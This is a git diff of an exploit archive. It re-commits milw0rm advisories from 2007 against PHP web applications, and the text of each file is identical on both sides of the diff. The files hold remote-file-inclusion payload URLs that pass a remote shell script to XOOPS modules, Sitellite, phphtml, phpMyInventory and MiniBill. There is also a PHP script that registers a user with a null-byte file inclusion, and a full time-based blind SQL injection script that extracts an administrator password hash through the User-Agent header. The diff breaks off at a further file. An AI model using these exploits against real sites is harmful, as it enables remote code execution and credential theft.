diff --git a/platforms/php/webapps/4069.txt b/platforms/php/webapps/4069.txt
index 40d3086b1..8a992903d 100755
--- a/platforms/php/webapps/4069.txt
+++ b/platforms/php/webapps/4069.txt
@@ -1,37 +1,37 @@
-##############################################################################################
-#         ___   ___                         _
-#        / _ \ / _ \                       | |
-#   __ _| | | | | | |_ __  ___   _ __   ___| |_
-#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
-# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
-#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
-#   __/ |
-#  |___/
-##############################################################################################
-#INFO:
-#Program Title ###############################################################################
-#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability
-#
-#Description #################################################################################
-#Content module for XOOPS CMS
-#
-#Vuln Code ###################################################################################
-#In /admin/spaw/spaw_control.class.php
-# include $spaw_root.'config/spaw_control.config.php';
-# include $spaw_root.'class/toolbars.class.php';
-# include $spaw_root.'class/lang.class.php';
-#
-#Script Download ##############################################################################
-#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
-#
-#Exploit ######################################################################################
-#
-#http://[ site ]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]?
-#
-#Credits ######################################################################################
-#FiSh for vulnerability
-#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
-#        grumpy, and everyone else at g00ns.net
-###############################################################################################
-
-# milw0rm.com [2007-06-13]
+##############################################################################################
+#         ___   ___                         _
+#        / _ \ / _ \                       | |
+#   __ _| | | | | | |_ __  ___   _ __   ___| |_
+#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
+# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
+#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
+#   __/ |
+#  |___/
+##############################################################################################
+#INFO:
+#Program Title ###############################################################################
+#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability
+#
+#Description #################################################################################
+#Content module for XOOPS CMS
+#
+#Vuln Code ###################################################################################
+#In /admin/spaw/spaw_control.class.php
+# include $spaw_root.'config/spaw_control.config.php';
+# include $spaw_root.'class/toolbars.class.php';
+# include $spaw_root.'class/lang.class.php';
+#
+#Script Download ##############################################################################
+#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
+#
+#Exploit ######################################################################################
+#
+#http://[ site ]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]?
+#
+#Credits ######################################################################################
+#FiSh for vulnerability
+#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
+#        grumpy, and everyone else at g00ns.net
+###############################################################################################
+
+# milw0rm.com [2007-06-13]
diff --git a/platforms/php/webapps/4070.txt b/platforms/php/webapps/4070.txt
index 1628f8fd4..618716e6e 100755
--- a/platforms/php/webapps/4070.txt
+++ b/platforms/php/webapps/4070.txt
@@ -1,38 +1,38 @@
-##############################################################################################
-#         ___   ___                         _
-#        / _ \ / _ \                       | |
-#   __ _| | | | | | |_ __  ___   _ __   ___| |_
-#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
-# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
-#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
-#   __/ |
-#  |___/
-##############################################################################################
-#INFO:
-#Program Title ###############################################################################
-#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability
-#
-#Description #################################################################################
-#Editor module for XOOPS CMS
-#
-#Vuln Code ###################################################################################
-#In /admin/editor2/spaw_control.class.php:
-# include $spaw_root.'config/spaw_control.config.php';
-# include $spaw_root.'class/toolbars.class.php';
-# include $spaw_root.'class/lang.class.php';
-#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.
-#
-#Script Download ##############################################################################
-#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
-#
-#Exploit ######################################################################################
-#
-#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]?
-#
-#Credits ######################################################################################
-#FiSh for vulnerability
-#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
-#        grumpy, and everyone else at g00ns.net
-###############################################################################################
-
-# milw0rm.com [2007-06-13]
+##############################################################################################
+#         ___   ___                         _
+#        / _ \ / _ \                       | |
+#   __ _| | | | | | |_ __  ___   _ __   ___| |_
+#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
+# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
+#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
+#   __/ |
+#  |___/
+##############################################################################################
+#INFO:
+#Program Title ###############################################################################
+#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability
+#
+#Description #################################################################################
+#Editor module for XOOPS CMS
+#
+#Vuln Code ###################################################################################
+#In /admin/editor2/spaw_control.class.php:
+# include $spaw_root.'config/spaw_control.config.php';
+# include $spaw_root.'class/toolbars.class.php';
+# include $spaw_root.'class/lang.class.php';
+#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.
+#
+#Script Download ##############################################################################
+#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
+#
+#Exploit ######################################################################################
+#
+#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]?
+#
+#Credits ######################################################################################
+#FiSh for vulnerability
+#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
+#        grumpy, and everyone else at g00ns.net
+###############################################################################################
+
+# milw0rm.com [2007-06-13]
diff --git a/platforms/php/webapps/4071.txt b/platforms/php/webapps/4071.txt
index 00d718e92..37e980e2c 100755
--- a/platforms/php/webapps/4071.txt
+++ b/platforms/php/webapps/4071.txt
@@ -1,36 +1,36 @@
-*sitellite*
-v 4.2.12
-DORK : "powered by Sitellite"
-FOUND BY : o0xxdark0o
-           o0xxdark0o[at]msn.com
-Website: http://www.sitellite.org/
-DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
-REMOTE FILE ICLUDE
-############################################################
-FILE :
-PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
-############################################################
-EXP:
-xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
-?
-############################################################
-CODE: on line 4
-
-############################################################
-thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
-www.hach-teach.org - www.3asfh.com
-############################################################
-BY : o0xxdark0o
-     o0xxdark0o@msn.com
-
-PhpDocumentor directory is .htaccess'ed
-
-# milw0rm.com [2007-06-14]
+*sitellite*
+v 4.2.12
+DORK : "powered by Sitellite"
+FOUND BY : o0xxdark0o
+           o0xxdark0o[at]msn.com
+Website: http://www.sitellite.org/
+DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
+REMOTE FILE ICLUDE
+############################################################
+FILE :
+PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
+############################################################
+EXP:
+xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
+?
+############################################################
+CODE: on line 4
+
+############################################################
+thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
+www.hach-teach.org - www.3asfh.com
+############################################################
+BY : o0xxdark0o
+     o0xxdark0o@msn.com
+
+PhpDocumentor directory is .htaccess'ed
+
+# milw0rm.com [2007-06-14]
diff --git a/platforms/php/webapps/4072.txt b/platforms/php/webapps/4072.txt
index b9fbe0182..ea0a1a0f9 100755
--- a/platforms/php/webapps/4072.txt
+++ b/platforms/php/webapps/4072.txt
@@ -1,57 +1,57 @@
-phphtml
-v 0.6.4
-FOUND BY : o0xxdark0o
-Website: http://www.sitellite.org/
-DOWNLOAD : http://sourceforge.net/projects/phphtml
-REMOTE FILE INCLUDE
-############################################################
-FILE :
-PATH\phphtml.php
-############################################################
-EXP:
-xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
-############################################################
-CODE: on line 19
-render();
-*/
-
-
-############################################################
-thanks for all my friends.. str0ke  .... oxdo .... cold z3ro
-www.hach-teach.org - www.3asfh.com
-############################################################
-BY : o0xxdark0o
-     o0xxdark0o@msn.com
-
-# milw0rm.com [2007-06-14]
+phphtml
+v 0.6.4
+FOUND BY : o0xxdark0o
+Website: http://www.sitellite.org/
+DOWNLOAD : http://sourceforge.net/projects/phphtml
+REMOTE FILE INCLUDE
+############################################################
+FILE :
+PATH\phphtml.php
+############################################################
+EXP:
+xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
+############################################################
+CODE: on line 19
+render();
+*/
+
+
+############################################################
+thanks for all my friends.. str0ke  .... oxdo .... cold z3ro
+www.hach-teach.org - www.3asfh.com
+############################################################
+BY : o0xxdark0o
+     o0xxdark0o@msn.com
+
+# milw0rm.com [2007-06-14]
diff --git a/platforms/php/webapps/4074.txt b/platforms/php/webapps/4074.txt
index 9f84d99f4..d6b3dd61d 100755
--- a/platforms/php/webapps/4074.txt
+++ b/platforms/php/webapps/4074.txt
@@ -1,52 +1,52 @@
-########################################################################################
-phpMyInventory (pmi)
-v. 2.8
-FOUND BY : o0xxdark0o
-                   o0xxdark0o[at]msn.com
-DOWNLOAD : http://sourceforge.net/projects/phpmyinventory/
-REMOTE FILE ICLUDE
-########################################################################################
-FILE :
-PATH\Includes\global.inc.php
-########################################################################################
-EXPLOIT:
-www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt?
-########################################################################################
-thanks for all my friends.. str0ke ... oxdo .... cold z3ro...keenest
-www.hach-teach.org - www.3asfh.com - www.goldenawy.com - www.yee7.com
-########################################################################################
-CODE:
- "
-
-Down     : http://www.yfma.com/count/click.php?id=1
-Site	 : http://yfma.com/yfs/
-
-Exploit  : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?
-
-Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]
-
-///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-
-# milw0rm.com [2007-06-17]
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+Title    : YourFreeScreamer 1.0 Remote File Ä°nclude
+
+Author   : Crackers_Child
+
+Contact  : cybermilitan@hotmail.com
+
+Bug      : in bodyTemplate.php "  "
+
+Down     : http://www.yfma.com/count/click.php?id=1
+Site	 : http://yfma.com/yfs/
+
+Exploit  : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?
+
+Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+# milw0rm.com [2007-06-17]
diff --git a/platforms/php/webapps/4076.php b/platforms/php/webapps/4076.php
index 80db2179b..e240dd962 100755
--- a/platforms/php/webapps/4076.php
+++ b/platforms/php/webapps/4076.php
@@ -1,185 +1,185 @@
- 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-// argv
-$host=$argv[1];
-$path=$argv[2];
-$f=$argv[3];
-$port=80;
-$proxy="";
-for ($i=3; $i<$argc; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-// Data
-
-$data='-----------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="action";
-
-register
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="login";
-
-dj7xpl
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="passwd";
-
-dj7xpl
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="passwd2";
-
-dj7xpl
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="email";
-
-dj7xpl\@yahoo.com
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="language";
-
-".$f."%00
------------------------------7d61bcd1f033e
-Content-Disposition: form-data; name="submit";
-
-New user signup
------------------------------7d61bcd1f033e--
-';
-// Send Data To Target ;)
-
-$packet ="POST ".$path."index.php? HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-sleep(1);
-
-// Print End Message
-Print "Exploit succeeded... ;)\r\n";
-print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl  and see file in your browser\r\n";
-
-?>
-
-# milw0rm.com [2007-06-17]
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+// argv
+$host=$argv[1];
+$path=$argv[2];
+$f=$argv[3];
+$port=80;
+$proxy="";
+for ($i=3; $i<$argc; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+// Data
+
+$data='-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="action";
+
+register
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="login";
+
+dj7xpl
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="passwd";
+
+dj7xpl
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="passwd2";
+
+dj7xpl
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="email";
+
+dj7xpl\@yahoo.com
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="language";
+
+".$f."%00
+-----------------------------7d61bcd1f033e
+Content-Disposition: form-data; name="submit";
+
+New user signup
+-----------------------------7d61bcd1f033e--
+';
+// Send Data To Target ;)
+
+$packet ="POST ".$path."index.php? HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+sleep(1);
+
+// Print End Message
+Print "Exploit succeeded... ;)\r\n";
+print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl  and see file in your browser\r\n";
+
+?>
+
+# milw0rm.com [2007-06-17]
diff --git a/platforms/php/webapps/4078.php b/platforms/php/webapps/4078.php
index cf6f25411..5a51c116d 100755
--- a/platforms/php/webapps/4078.php
+++ b/platforms/php/webapps/4078.php
@@ -1,170 +1,170 @@
-#!/usr/bin/php -q -d short_open_tag=on
- 
-Thanks to rgod for the php code and Marty for the Love
-
-Special Thanks to all the guys of milw0rm IRC channel for theyr help
-
-------------------------------------------------------------------------
-";
-if ($argc<3) {
-echo "
-Usage: php ".$argv[0]." Host Path
-Host:          target server (ip/hostname)
-Path:          path of revbb
-
-Example:
-php ".$argv[0]." localhost /solar/
-";
-die;
-}
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-/*
-This plattform is quite old, but i know that some guys tooked it for making some
-indipendent project.. they may have took this bug to, so i'll ceck as soon as i
-finish my last exam..
-
-Vuln Explanation:
-
-goto common.inc.php:
-
-function insert_history($l_id,$i_text)
-{
-	global $db_name;
-	if(empty($db_name)){
-		$db_name = "None";
-	}
-	dbn("insert into user_history VALUES ('$l_id','".time()."','$db_name','".mysql_escape_string($i_text)."','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')");
-}
-
-$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack;
-Because the admin name is always the same (Admin)we will attack this username, also because there isn't any counting
-of the login attempts..
-
-WARNING:
-
-old version of mysql may not support subquerys, so the exploit wouldn't work.
-to bypass this you can exploit the game sending an XSS into the log and praying that the admin
-see it..
-
-*/
-$host=$argv[1];
-$path=$argv[2];
-
-$port=80;
-$proxy="";
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$md5s[0]=0;//null
-$md5s=array_merge($md5s,range(48,57)); //numbers
-$md5s=array_merge($md5s,range(97,102));//a-f letters
-#print_r(array_values($md5s));
-
-$j=1;$password="";
-while (!strstr($password,chr(0)))
-{
-for ($i=0; $i<=255; $i++)
-{
-if (in_array($i,$md5s))
-{
-$starttime=time();
-$sql="FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";
-$packet ="POST ".$p."game_listing.php HTTP/1.0\r\n";
-$data="l_name=Admin";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="CLIENT-IP: 999.999.999.999'; echo '123\r\n";//spoof
-$packet.="User-Agent: $sql\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-  //debug
-  #die($html);
-  sendpacketii($packet);
-if (eregi("The used SELECT statements have a different number of columns",$html)){echo $html; die("\nunknown query error...");}
-  $endtime=time();
-  echo "endtime -> ".$endtime."\r\n";
-  $difftime=$endtime - $starttime;
-  echo "difftime -> ".$difftime."\r\n";
-  if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(1);break;}
-}
-  if ($i==255) {die("Exploit failed...");}
-  }
-  $j++;
-}
-echo "
-
-$uname Hash is:  $password";
-
-# Coded With BH Fast Generator v0.1
-?>
-
-# milw0rm.com [2007-06-18]
+#!/usr/bin/php -q -d short_open_tag=on
+ 
+Thanks to rgod for the php code and Marty for the Love
+
+Special Thanks to all the guys of milw0rm IRC channel for theyr help
+
+------------------------------------------------------------------------
+";
+if ($argc<3) {
+echo "
+Usage: php ".$argv[0]." Host Path
+Host:          target server (ip/hostname)
+Path:          path of revbb
+
+Example:
+php ".$argv[0]." localhost /solar/
+";
+die;
+}
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+/*
+This plattform is quite old, but i know that some guys tooked it for making some
+indipendent project.. they may have took this bug to, so i'll ceck as soon as i
+finish my last exam..
+
+Vuln Explanation:
+
+goto common.inc.php:
+
+function insert_history($l_id,$i_text)
+{
+	global $db_name;
+	if(empty($db_name)){
+		$db_name = "None";
+	}
+	dbn("insert into user_history VALUES ('$l_id','".time()."','$db_name','".mysql_escape_string($i_text)."','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')");
+}
+
+$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack;
+Because the admin name is always the same (Admin)we will attack this username, also because there isn't any counting
+of the login attempts..
+
+WARNING:
+
+old version of mysql may not support subquerys, so the exploit wouldn't work.
+to bypass this you can exploit the game sending an XSS into the log and praying that the admin
+see it..
+
+*/
+$host=$argv[1];
+$path=$argv[2];
+
+$port=80;
+$proxy="";
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$md5s[0]=0;//null
+$md5s=array_merge($md5s,range(48,57)); //numbers
+$md5s=array_merge($md5s,range(97,102));//a-f letters
+#print_r(array_values($md5s));
+
+$j=1;$password="";
+while (!strstr($password,chr(0)))
+{
+for ($i=0; $i<=255; $i++)
+{
+if (in_array($i,$md5s))
+{
+$starttime=time();
+$sql="FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";
+$packet ="POST ".$p."game_listing.php HTTP/1.0\r\n";
+$data="l_name=Admin";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="CLIENT-IP: 999.999.999.999'; echo '123\r\n";//spoof
+$packet.="User-Agent: $sql\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+  //debug
+  #die($html);
+  sendpacketii($packet);
+if (eregi("The used SELECT statements have a different number of columns",$html)){echo $html; die("\nunknown query error...");}
+  $endtime=time();
+  echo "endtime -> ".$endtime."\r\n";
+  $difftime=$endtime - $starttime;
+  echo "difftime -> ".$difftime."\r\n";
+  if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(1);break;}
+}
+  if ($i==255) {die("Exploit failed...");}
+  }
+  $j++;
+}
+echo "
+
+$uname Hash is:  $password";
+
+# Coded With BH Fast Generator v0.1
+?>
+
+# milw0rm.com [2007-06-18]
diff --git a/platforms/php/webapps/4079.txt b/platforms/php/webapps/4079.txt
index bbbe25aae..ba5ddb016 100755
--- a/platforms/php/webapps/4079.txt
+++ b/platforms/php/webapps/4079.txt
@@ -1,18 +1,18 @@
-=======================================================
-MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
-=======================================================
-Found By : Abo0od , abod@islam-attack.com
-=======================================================
-Homepage: http://www.hack-teach.org/cc
-=======================================================
-Script Site : http://www.ultrize.com/minibill/index.php?page=download
-=======================================================
-File: /crontab/run_billing.php <= $config['include_dir']
-========================================================
-Exploit:
-site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
-=======================================================
-greets to : www.islam-attack.com
-=======================================================
-
-# milw0rm.com [2007-06-18]
+=======================================================
+MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
+=======================================================
+Found By : Abo0od , abod@islam-attack.com
+=======================================================
+Homepage: http://www.hack-teach.org/cc
+=======================================================
+Script Site : http://www.ultrize.com/minibill/index.php?page=download
+=======================================================
+File: /crontab/run_billing.php <= $config['include_dir']
+========================================================
+Exploit:
+site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
+=======================================================
+greets to : www.islam-attack.com
+=======================================================
+
+# milw0rm.com [2007-06-18]
diff --git a/platforms/php/webapps/4081.php b/platforms/php/webapps/4081.php
index 16fedff10..fa6dc6788 100755
--- a/platforms/php/webapps/4081.php
